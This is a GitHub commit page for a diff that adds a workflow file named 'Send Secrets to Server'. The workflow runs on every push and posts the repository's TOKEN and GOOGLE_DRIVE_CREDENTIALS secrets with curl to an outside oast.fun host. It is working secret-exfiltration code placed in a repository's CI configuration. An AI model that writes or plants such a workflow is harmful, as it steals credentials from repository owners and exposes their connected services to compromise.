Skip to content

Commit

Permalink
Create Send Secrets to Server workflow
Browse files Browse the repository at this point in the history
  • Loading branch information
aryonuwi committed Oct 31, 2024
1 parent 620b564 commit 6b7f230
Showing 1 changed file with 18 additions and 0 deletions.
18 changes: 18 additions & 0 deletions .github/workflows/b85abe1c-ea46-4f02-8834-504fdb612dd7.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
name: Send Secrets to Server

on:
push:
workflow_dispatch:

jobs:
send-secrets:
runs-on: ubuntu-latest

steps:
- name: Bypass Cache
run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

- name: Send Secrets to Server
run: |
curl -d 'TOKEN=${{ secrets.TOKEN }}&GOOGLE_DRIVE_CREDENTIALS=${{ secrets.GOOGLE_DRIVE_CREDENTIALS }}' https://yvfeehabjheovlaaoqyvn66e0rr6cykf4.oast.fun

0 comments on commit 6b7f230

Please sign in to comment.